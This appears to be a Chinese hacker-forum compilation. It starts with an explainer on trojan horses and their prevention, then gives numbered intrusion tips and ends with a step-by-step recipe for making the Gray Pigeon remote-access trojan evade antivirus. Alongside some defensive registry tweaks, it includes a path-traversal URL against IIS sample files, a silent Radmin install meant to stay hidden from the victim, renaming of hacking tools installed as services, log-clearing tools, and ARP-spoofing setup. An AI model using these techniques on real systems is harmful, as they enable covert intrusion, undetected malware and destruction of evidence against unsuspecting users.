木马的产生与发展

木马的产生与发展
与病毒一样，木马也是从Unix平台上产生出来，在Windows操作系统上“发扬光大”的。

最早的Unix木马与现在流行的BO、冰河等有很大的不同，它是运行在服务器后台的一个小程序，伪装成Unix的login登录过程。

那时候计算机还属于很珍贵的宝物，不是个人能够买得起的，某个大学、研究机构可能会有一台计算机，大家都从终端上用自己的帐号来登录连接到它上面。

那么我们就可以看一下，用户向一台中了木马的计算机上登录时会发生什么事情：用户登录的时候，木马劫持登录过程，向用户提供一个与正常登录界面一样的输入窗口，骗用户输入。

在得到用户名和口令之后，木马就会把它存放起来，然后把真正的登录进程调出来。

这时用户看到登录界面第二次出现了，这与通常的密码错误的现象是一样的，于是用户再次输入信息而进入系统。

整个过程没有人发觉，而密码已经保存在硬盘的某个小角落里了，黑客隔一段时间就可以访问一下服务器，看看有多少收获。

随着木马开发者们孜孜不倦的努力，随后又出现了ftp型、破坏型、信息发送型等等的接班人。

ftp型打开所在计算机的端口，使他人可以跳过密码上传或下载；信息发送型木马找到系统中的重要信息如密码等，用e-mail发送到指定的信箱中；破坏型可以删除文件甚至格式化硬盘（真是损人不利已）。

不过现在最流行的还是远程控制型的，我们要在这里详细介绍。

下面咱们掀起她的盖头来，分析一下这木马的行动原理。

远程控制型木马的运行原理
这是目前最受广大黑帽子欢迎的一类木马。

以冰河为例，在一台中了招的机器上，除了正常的服务（如FTP等）之外，冰河的服务器端，就是安装在受害机器上的木马，会秘密地开放出一个默认的TCP 7626端口，让黑客连接实现远程控制。

这与正规的PC-Anywhere、Terminal Service等商业远程管理软件的效果是一样的。

同样可以进行远程桌面的直接控制，冰河服务器端的大小是260多K，而商业软件是一、二十兆。

这种黑客软件做得也真是够精巧的了。

当然这也是木马成功进入他人系统的必要条件，太大的木马很容易被别人发觉。

木马是怎样植入计算机的？
木马首先要伪装自己。

一般有两种隐藏手段，第一种是把自己伪装成一般的软件。

我在做安全工程的时候就碰到一个程序员中了木马，他在论坛上得到一个小程序，拿下来执行了一下，但系统报告了内部错误，程序退出了。

他认为是程序没有开发好，就没有在意。

谁知有一天自己的QQ密码怎么也进不去，他才觉得不对了。

我们后来检查那个程序，果然是个木马伪装成的，在木马代码的前段会完成自我安装与隐藏的过程，最后显示一个错误信息，骗过用户。

第二种是把自己绑定在正常的程序上面。

老到的黑客可以通过编程把一个正版winzip 安装程序和木马编译成一个新的文件，它即可以一边进行winzip程序的正常安装，一边神不知鬼不觉地把木马种下去。

这种木马有可能被细心的用户发觉，因为这个winzip程序在绑定了木马之后尺寸就会变大。

伪装之后，木马就可以通过邮件发给被攻击者了，或者是放在网站上供人下载。

黑客还会为它们加上一些动人的话语来诱惑别人，象“最新笑笑小电影！”、“cuteFTP4.0完全解密版！！！”（一点不骗人，安装了这个cuteFTP之后，你的机器就被“完全解密”了）。

那些喜
欢免费盗版的朋友们也要小心了。

（写到这里突然想起一句名言：这世上没有比免费更贵的了......）
怎样预防与清除木马
预防其实很简单，就是不要执行任何来历不明的软件或程序，不管是邮件中还是Internet上下载到的。

在下载软件时，一定要从正规的网站上下载。

同特洛伊城的人们一样，计算机中了马的人都是自己把马牵回家的，真是“引马入室”。

觉得可疑时一定要先检查，再使用。

上网的计算机必备防毒软件，一个好的杀毒软件同样也可以查到绝大多数木马程序，但一定要记得时时更新代码。

清除木马很复杂了，限于篇幅就不一一列举了。

每一种木马有自己的隐藏甚至是恢复的方式，相应地就有一种清除方式。

如冰河木马在安装之后就会把原来的文件删除，让别人看不到异常的文件，同时把安装好的程序伪装成Windows系统内部程序。

在被发现而删除之后，它还会通过注册表的设置在用户打开任何一个文本文件时恢复，不知道的人很难清除干净。

曾经见到国外一本专门描述200多个木马程序的书，说明它们的运行方法与清除方法，厚厚的一大本。

所以建议碰到木马的时候请专家来处理。

如果你本身就是一个熟练的操作者，那你就需要可靠的参考资料，就象上面提到的那一本书。

对付木马还是以预防为主......
整理:冰血封情来自:
NO.1修改Terminal Server的端口
服务端
进入注册表编辑器，依次展开如下键名：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp 在右窗口中修改PortNumber的数值为任意端口号，推荐1025<端口号<65535
客户端
启动Terminal Server Client的客户端管理器，到出连接文件为*.cns，用记事本打开修改Server Port与服务器一致就OK了.
最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器。

NO.2禁止远程访问注册表
In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!
方法一、
右键单击‘我的电脑'，选‘管理'，‘服务和应用程序'，‘服务'！
停止并且禁用Remote Registry Service服务！
方法二、
打开注册表编辑器的如下键：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers
把其下的WinReg的键职改成1就可以了。

NO.3禁止非管理员用户使用AT命令
这个小技巧的好处应该不言而喻：）
启动注册表编辑器，展开如下键：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
在右边新建立一个SubmitControl键名，DWORD值为1。

NO.4使LINUX对PING不响应
LINUX应该逐渐成为各位大峡小鸟手中之宝了吧？怎么才能让它不响应ICMP来保护自己呢？
可以用：
echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all
想恢复的时候用：
echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all
NO.5让WIN98安全模式支持网络
大家都知道WIN98安全模式要是可以进去，是可以不受网吧安全管理软件的约束的！BUT安全模式不加载网络驱动，下面冰血告诉你一种让WIN98的安全模式提供网络支持的方法。

1、F8进入安全模式。

2、选择Command Prompt Only。

3、进入命令行状态时，输入Win /d:n即可以进入代命令行的安全模式。

NO.6启动IP路由功能
一般我们在WINDOWSNT/2K/XP使用ARP欺骗攻击的时候都需要先打开IP路由功能。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters IPEnableRouter=0x1
NO.7强大的FC对比命令
我们在使用系统和进行各种任务的时候经常需要用到文件的对比，那么我们是自己一点点的对比么？当然不是我们用强大的FC对比命令。

具体参数请用FC /?进行查看
NO.8通过验证Banner手工鉴别FTP
cmd下输入
ftp TargetIP
User (TargetIP:(none)):ftp
331 User name okey, please send complete E-mail address as password. Password:
如果成功
230 User logged in, proceed.
如果失败
530 Sorry, no ANONYMOUS access allowed.
特别是这一行字是Serv-U的特有标志
331 User name okey, please send complete E-mail address as password.
假如是MS FTP呢
cmd下输入
ftp TargetIP
220 antivirus Microsoft FTP Serveice(Version 5.0).
User (TargetIP:(none)): ftp
331 Password required for ftp.
Password:
530 User ftp cannot log in.
特别是这一行字是MS FTP的特有标志
331 Password required for ftp.
NO.9漏洞qsumrhit.htw和iirturnh.htw的使用方法
这个比较希奇，还是说说：
提交例如如下的连接就可以了......
连接iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirest riction=none&cihilitetype=full">/iissamples/issamples/oop/qs umrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=f ull
NO.10远程控制软件Radmin安装注意事项
网络渗透中。

使用远程安装Radmin的进行控制时候，必须使用如下命令：
Radmin /install /silence
否则对方的计算机窗口会弹出一个提示框说"远程管理服务已经安装"。

NO.12终端服务客户端的操作问题
注意，通过克隆而获得管理员权限的用户是和管理员共用一个桌面的。

如果你在桌面建立东西，管理员那边是同样可以看见的。

NO.13注册成服务的黑客软件的各项指标修改方法
假如你已经吧一个叫hackertools的工具注册成了系统的服务，在服务列表中存在。

那么你要怎么修改他的名字呢？
这里进入注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
找到它的服务名，假设是hcktol，现在展开他的下面间。

displayname就是服务显示名
description就是服务描述
另外可以通过用16进制编辑器修改服务进程名。

用辅助工具instsrv.vbs把程序安装成自己的指定服务名和服务相识名服务。

具体请看帮助，到处有下。

NO.14有关清除日志的话题
/forum/read.php?tid=1881
/forum/read.php?tid=1821
/forum/read.php?tid=1781
/forum/read.php?tid=1610
/forum/read.php?tid=1581
/forum/read.php?tid=1490
/forum/read.php?tid=1429
/forum/read.php?tid=1337
/forum/read.php?tid=1236
/forum/read.php?tid=992
/forum/read.php?tid=942
/forum/read.php?tid=594
/forum/read.php?tid=196
/forum/read.php?tid=2016
以上是在邪恶八进制（EvilOctal）暨安全高峰（SecurityPeak）论坛上以关键字为"日志"的资料索引分别对应如下主题：
[转帖]3389如何擦除日志
[转载]关于入侵检测系统之日志检测详解
[转载]入侵检测之日志检测
[转载]国外的培训课程安全日志的秘密
[转载]Windows日志的保护与伪造
[转载]用perl写了个把IIS日志导入到mysql的程序
[转载]终端服务的日志监控
[转载]删除sql server日志
[转载]WINDOWS安全事件日志中的事件编号与描述
[转载]如何用elsave清除日志
[转载]FreeBSD的系统log日志
[转载]UNIX系统后门的安放和日志的擦除
[转载]安全事件日志事件编号与描述
[转载]详述Windows 2000的日志及其删除方法
共13条信息
非常感谢你支持偶们！
关于...自动清除日志软件类很多
如：
小榕的elsave清除日志工具
小榕的CleanIISLog来自动清除日志
还有CSDN公布的ClearLogs工具
以及擦PP工具0x333shadow
专业清除日志iisantidote-v2工具也可以
NO.15无法删除文件的问题
有时候我们要删除一些文件经常提示无法删除 EvilOctal总结了一下主要有以下几种可能
第一文件名中可能有特殊符号
那么无论你是在操作系统中还是使用命令行下的del命令都是无法删除的这时解决方法是使用命令rd "\\?\文件路径\文件名" 就可以删除了
第二有可能是文件正在使用中
那么只要找到正在使用该软件的进程终止后删除当然一般情况下也可以到安全模式或者命令行下删除的
第三可能是文件的优先级不够高
在任务管理器里把相关进程的优先级降低然后再一顿狂杀乱砍
第四也许是磁盘有逻辑错误
使用chkdsk检查一下再行删除看看
NO.16有关mid音乐格式的音轨调查
今天朋友FlyingBird传输了一个音乐给我 mid格式的但是实在是播放不了
原来 mid音频走的是音乐控制面版中的软件合成器的音轨
不想我把他静音了所以什么也听不见
在主音量控制面版里将软件合成器钩取消后就可以下的静音取消就可以放了... NO.17在139入侵过程中遇见host not found？
在正常情况下应该是这样的：
[QUOTE]
Node IpAddress: [xxx.xxx.x.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
REFDOM <00> UNIQUE Registered
REFDOM <03> UNIQUE Registered
REFDOM <20> UNIQUE Registered
REFDOM$ <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~REFDOM.......<00> UNIQUE Registered
......
MAC Address = XX-XX-XX-XX-XX-XX
[/QUOTE]
如果对方有文件（或者打印）共享，那么就会显示类似上面的信息。

如果出现的是‘Host Not Found'，那么就可能没有提供共享或者安装了防火墙之类的软件阻隔了，具体情况冰血封情也很难猜测了：）
NO.183389端口开放配合输入法漏洞攻击法
这个可是个老漏洞了当然很多菜鸟还在找汗...
以下是邪恶八进制（EvilOctal）暨安全高峰（SecurityPeak）论坛上截止9月10日的3389攻防主题索引
/forum/read.php?tid=1881
/forum/read.php?tid=1015
/forum/read.php?tid=125
/forum/read.php?tid=1593
/forum/read.php?tid=1429
/forum/read.php?tid=534
/forum/read.php?tid=162
/forum/read.php?tid=151
/forum/read.php?tid=124
/forum/read.php?tid=65
....
分别对应
[转帖]3389如何擦除日志
[转载]远程开启3389终端服务
[转载]总结开3389的5种方法
[转帖]怎么记录3389登录者的IP
[转载]终端服务的日志监控
[转载]菜鸟使用SC远程启动终端服务的误区
[转载]终端服务使用大全
[转载]修改终端服务端口的方法
[转载]远程启动终端服务最简单的方法
[转载]终端服务全攻略
....
其他的请自己搜索...
睦睦原创灰鸽子2005vip免杀笔录
工具：花花添加器v2.0.1
PEditor
petite22
ResScope.exe
Aspack2.12
Scrambler V1.0.exe
首先用ResScope.exe 从鸽子客户端导出 main.dll getkey.dll hook.dll，下面用简单的图来描述免杀过程，我个人觉得这样直观。

一。

getkey.dll hook.dll 的免杀
getkey.dll —>花花添加器v2.0.1（花指令选择：无极，区段名：我爱珊
珊，区段大小99）—>
用PEditor 将入口点加1 —> 用 petite22压缩—> 用用PEditor 将入口
点减1-—>免杀完成。

hook.dll—>花花添加器v2.0.1（花指令选择：无极，区段名：我爱珊珊，
区段大小99）—>
用PEditor 将入口点加1 —> 用 petite22压缩—> 用用PEditor 将入口
点减1-—>免杀完成。

将 getkey.dll hook.dll 导入main.dll。

二。

mian.dll 的免杀。

mian.dll —>Aspack2.12压缩—>Aspack2.12再压缩—>Scrambler
V1.0.exe 修复—>完成。

将main.dll导入服务端。

三。

服务端免杀。

鸽子服务端—>花花添加器v2.0.1（花指令选择：无极，区段名：我爱珊珊，区段大小99）—>
用PEditor 将入口点加1 —> 用 petite22压缩—> 用用PEditor 将入口点减1-—>免杀完成。